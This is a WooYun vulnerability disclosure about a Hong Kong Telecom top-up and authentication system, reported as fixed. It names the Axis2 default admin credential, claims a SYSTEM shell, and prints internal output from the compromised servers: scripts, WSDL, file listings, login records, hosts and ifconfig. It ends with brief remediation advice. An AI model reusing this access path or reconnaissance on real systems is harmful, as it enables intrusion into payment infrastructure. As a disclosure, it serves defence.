乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-09: 细节已通知厂商并且等待厂商处理中 2015-10-12: 厂商已经确认,细节仅向厂商公开 2015-10-22: 细节向核心白帽子及相关领域专家公开 2015-10-26: 厂商已经修复漏洞并主动公开,细节向公众公开
电讯盈科旗下香港电讯系统存在漏洞(涉移动電話认证服务、增值服务),间接利用可管理电讯储值卡之类的系统;系统后台是个负载均衡集群,可影响多台服务器;
#1 漏洞地址
http://**.**.**.**/axis2/**.**.**.**,开启了负载均衡服务,后台存在多台服务器**.**.**.** **.**.**.****.**.**.** **.**.**.**
系统对应其它地址:https://**.**.**.**/login
#2 axis2管理默认口令admin:axis2
#3 getSYSTEM shell
#4 payment服务
if netstat -an |grep ":8080" |grep LISTEN > /dev/null && ps -ef | grep /opt/bpp/tomcat |grep -v "grep" > dev/nullthen echo "Start Payment Client Application on " `hostname` " at " `date` >> $RESTART_LOG 2>&1 cd / su - tomcat -c "/home/oper/linux/payment_start.sh"else echo "Tomcat is NOT RUNNING" >> $RESTART_LOG 2>&1
#5 该系统对应的其它系统服务
This XML file does not appear to have any style information associated with it. The document tree is shown below.<wsdl:definitions xmlns:wsdl="http://**.**.**.**/wsdl/" xmlns:ns1="http://org.apache.axis2/xsd" xmlns:ns="http://**.**.**.**" xmlns:ax27="http://**.**.**.**/xsd" xmlns:wsaw="http://**.**.**.**/2006/05/addressing/wsdl" xmlns:ax25="http://**.**.**.**/xsd" xmlns:http="http://**.**.**.**/wsdl/http/" xmlns:xs="http://**.**.**.**/2001/XMLSchema" xmlns:mime="http://**.**.**.**/wsdl/mime/" xmlns:soap="http://**.**.**.**/wsdl/soap/" xmlns:soap12="http://**.**.**.**/wsdl/soap12/" targetNamespace="http://**.**.**.**"><wsdl:documentation>MonitiseServices</wsdl:documentation><wsdl:types><xs:schema attributeFormDefault="qualified" elementFormDefault="qualified" targetNamespace="http://**.**.**.**/xsd"><xs:complexType name="MonitiseAccountValidateOutputDTO"><xs:sequence></xs:complexType></xs:schema><xs:schema attributeFormDefault="qualified" elementFormDefault="qualified" targetNamespace="http://**.**.**.**/xsd"><xs:complexType name="MonitiseInputDTO"><xs:sequence><xs:element minOccurs="0" name="channel" nillable="true" type="xs:string"/><xs:element minOccurs="0" name="msisdn" nillable="true" type="xs:string"/><xs:element minOccurs="0" name="starterPackId" nillable="true" type="xs:string"/><xs:element minOccurs="0" name="topupAmount" type="xs:float"/><xs:element minOccurs="0" name="transactionId" nillable="true" type="xs:string"/></xs:sequence></xs:complexType></xs:schema><xs:schema xmlns:ax28="http://**.**.**.**/xsd" xmlns:ax26="http://**.**.**.**/xsd" attributeFormDefault="qualified" elementFormDefault="qualified" targetNamespace="http://**.**.**.**"><xs:import namespace="http://**.**.**.**/xsd"/><xs:import namespace="http://**.**.**.**/xsd"/><xs:element name="validateTopup"><xs:complexType><xs:sequence><http:address location="http://**.**.**.**/axis2/services/MonitiseServices.MonitiseServicesHttpEndpoint/"/></wsdl:port></wsdl:service></wsdl:definitions>
drwxr-x--- 2 tomcat tomcat 4096 Jul 7 2014 .drwxr-x--- 5 tomcat tomcat 4096 Jul 7 2014 ..-rw-r----- 1 tomcat tomcat 15840 Jun 30 2014 AccumulativeChrgSumyAction.class-rw-r----- 1 tomcat tomcat 19122 Apr 23 2014 AccumulativeChrgSumyAction.java-rw-r----- 1 tomcat tomcat 2057 Jun 30 2014 ActionConstant.class-rw-r----- 1 tomcat tomcat 2154 Nov 12 2013 ActionConstant.java-rw-r----- 1 tomcat tomcat 1267 Jul 4 2014 AlipayTopupAction$1.class-rw-r----- 1 tomcat tomcat 27144 Jul 4 2014 AlipayTopupAction.class-rw-r----- 1 tomcat tomcat 36573 Jul 4 2014 AlipayTopupAction.java-rw-r----- 1 tomcat tomcat 1248 Jul 4 2014 AlipayTopupAction$miTM.class-rw-r----- 1 tomcat tomcat 4557 Jun 30 2014 AutoLogonAction.class-rw-r----- 1 tomcat tomcat 4187 Feb 6 2014 AutoLogonAction.java-rw-r----- 1 tomcat tomcat 1182 Jun 30 2014 CardInfoAction.class-rw-r----- 1 tomcat tomcat 544 Nov 12 2013 CardInfoAction.java-rw-r----- 1 tomcat tomcat 7788 Jun 30 2014 CardInformationAction.class-rw-r----- 1 tomcat tomcat 6984 Nov 12 2013 CardInformationAction.java-rw-r----- 1 tomcat tomcat 5483 Jun 30 2014 ChangePasswordAction.class-rw-r----- 1 tomcat tomcat 5525 Nov 27 2013 ChangePasswordAction.java-rw-r----- 1 tomcat tomcat 10347 Jun 30 2014 ChangeVasAction.class-rw-r----- 1 tomcat tomcat 9418 Nov 28 2013 ChangeVasAction.java-rw-r----- 1 tomcat tomcat 4976 Jun 30 2014 ForgetPasswordAction.class-rw-r----- 1 tomcat tomcat 4419 Feb 17 2014 ForgetPasswordAction.java-rw-r----- 1 tomcat tomcat 2040 Jun 30 2014 LogonAction.class-rw-r----- 1 tomcat tomcat 1563 Nov 12 2013 LogonAction.java-rw-r----- 1 tomcat tomcat 682 Jun 30 2014 LogoutAction.class-rw-r----- 1 tomcat tomcat 384 Nov 12 2013 LogoutAction.java-rw-r----- 1 tomcat tomcat 6984 Jun 30 2014 ManualLoginAction.class-rw-r----- 1 tomcat tomcat 6165 Jan 3 2014 ManualLoginAction.java-rw-r----- 1 tomcat tomcat 596 Jun 30 2014 MessageAction.class-rw-r----- 1 tomcat tomcat 304 Nov 12 2013 MessageAction.java-rw-r----- 1 tomcat tomcat 4936 Jun 30 2014 NEAction.class-rw-r----- 1 tomcat tomcat 5319 Jun 18 2014 NEAction.java-rw-r----- 1 tomcat tomcat 20582 Jun 30 2014 OnlineTopupAction.class-rw-r----- 1 tomcat tomcat 22270 Jun 18 2014 OnlineTopupAction.java-rw-r----- 1 tomcat tomcat 2341 Jun 30 2014 PropertiesAction.class-rw-r----- 1 tomcat tomcat 1768 Nov 12 2013 PropertiesAction.java-rw-r----- 1 tomcat tomcat 4213 Jun 30 2014 RetrievePasswordAction.class-rw-r----- 1 tomcat tomcat 4092 Nov 27 2013 RetrievePasswordAction.java-rw-r----- 1 tomcat tomcat 1357 Jun 30 2014 SmsHistoryAction.class-rw-r----- 1 tomcat tomcat 766 Nov 12 2013 SmsHistoryAction.java-rw-r----- 1 tomcat tomcat 11972 Jun 30 2014 SmsSettingAction.class-rw-r----- 1 tomcat tomcat 13075 Nov 27 2013 SmsSettingAction.java-rw-r----- 1 tomcat tomcat 1693 Jun 30 2014 TestDisplayAction.class-rw-r----- 1 tomcat tomcat 932 Nov 12 2013 TestDisplayAction.java-rw-r----- 1 tomcat tomcat 2757 Jun 30 2014 TestUpdateAction.class-rw-r----- 1 tomcat tomcat 2615 Nov 27 2013 TestUpdateAction.java-rw-r----- 1 tomcat tomcat 4475 Jun 30 2014 UsageEntitlementAction.class-rw-r----- 1 tomcat tomcat 3831 Nov 27 2013 UsageEntitlementAction.java-rw-r----- 1 tomcat tomcat 2082 Jun 30 2014 VasAction.class-rw-r----- 1 tomcat tomcat 1395 Nov 27 2013 VasAction.java-rw-r----- 1 tomcat tomcat 16554 Jun 30 2014 VoucherOnlineTopupAction.class-rw-r----- 1 tomcat tomcat 25868 Feb 17 2014 VoucherOnlineTopupAction.java
last -20sitescop pts/2 **.**.**.** Fri Oct 9 10:50 still logged in sitescop pts/0 **.**.**.** Fri Oct 9 10:20 still logged in sitescop pts/6 **.**.**.** Fri Oct 9 10:00 still logged in sitescop pts/2 **.**.**.** Fri Oct 9 09:45 - 10:45 (00:59) sitescop pts/0 **.**.**.** Fri Oct 9 09:00 - 10:10 (01:09) sitescop pts/6 **.**.**.** Fri Oct 9 01:25 - 09:55 (08:30) sitescop pts/5 **.**.**.** Fri Oct 9 01:24 still logged in sitescop pts/2 **.**.**.** Fri Oct 9 01:20 - 09:35 (08:14) sitescop pts/4 **.**.**.** Fri Oct 9 01:20 still logged in sitescop pts/3 **.**.**.** Fri Oct 9 01:18 still logged in sitescop pts/2 **.**.**.** Fri Oct 9 01:18 - 01:20 (00:01) sitescop pts/3 **.**.**.** Fri Oct 9 01:18 - 01:18 (00:00) sitescop pts/5 **.**.**.** Fri Oct 9 01:18 - 01:19 (00:01) sitescop pts/2 **.**.**.** Fri Oct 9 01:18 - 01:18 (00:00) sitescop pts/0 **.**.**.** Fri Oct 9 01:18 - 08:55 (07:37) sitescop pts/5 **.**.**.** Wed Oct 7 04:00 - 01:15 (1+21:15) sitescop pts/4 **.**.**.** Wed Oct 7 03:45 - 01:18 (1+21:33) sitescop pts/6 **.**.**.** Wed Oct 7 02:45 - 01:18 (1+22:33) cspsbat pts/7 hp90 Tue Oct 6 15:01 - 15:36 (00:34) sitescop pts/3 **.**.**.** Tue Oct 6 05:13 - 01:14 (2+20:00)
# Do not remove the following line, or various programs# that require network functionality will fail.**.**.**.** localhost.localdomain localhost::1 localhost6.localdomain6 localhost6**.**.**.** **.**.**.****.**.**.** lx23 LX23 xhkalx23 XHKALX23**.**.**.** hp90 HP90 xhkahp90 XHKAHP90**.**.**.** hp91 HP91 xhkahp91 XHKAHP91**.**.**.** lx39 LX39 xhkalx39 XHKALX39**.**.**.** lx40 LX40 xhkalx40 XHKALX40**.**.**.** lx49 LX49 xhkalx49 XHKALX49**.**.**.** lx50 LX50 xhkalx50 XHKALX50**.**.**.** NTSYSA16 ntsysa16**.**.**.** **.**.**.**
ifconfigeth0 Link encap:Ethernet HWaddr E4:1F:13:67:3E:1C inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.** inet6 addr: fe80::e61f:13ff:fe67:3e1c/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:2738312948 errors:0 dropped:0 overruns:0 frame:0 TX packets:2278510958 errors:67591190 dropped:0 overruns:0 carrier:67591190 collisions:80445229 txqueuelen:1000 RX bytes:358356022427 (333.7 GiB) TX bytes:1627045472176 (1.4 TiB) Interrupt:169 Memory:a6000000-a6012800 eth1 Link encap:Ethernet HWaddr E4:1F:13:67:3E:1E inet addr:**.**.**.** Bcast:**.**.**.**55 Mask:**.**.**.** UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
#1 删除不需要用到的中间件#2 避免默认配置#3 皮面弱口令
危害等级:高
漏洞Rank:16
确认时间:2015-10-12 14:05
已將事件通知有關機構
2015-10-26:相關機構回報已修復漏洞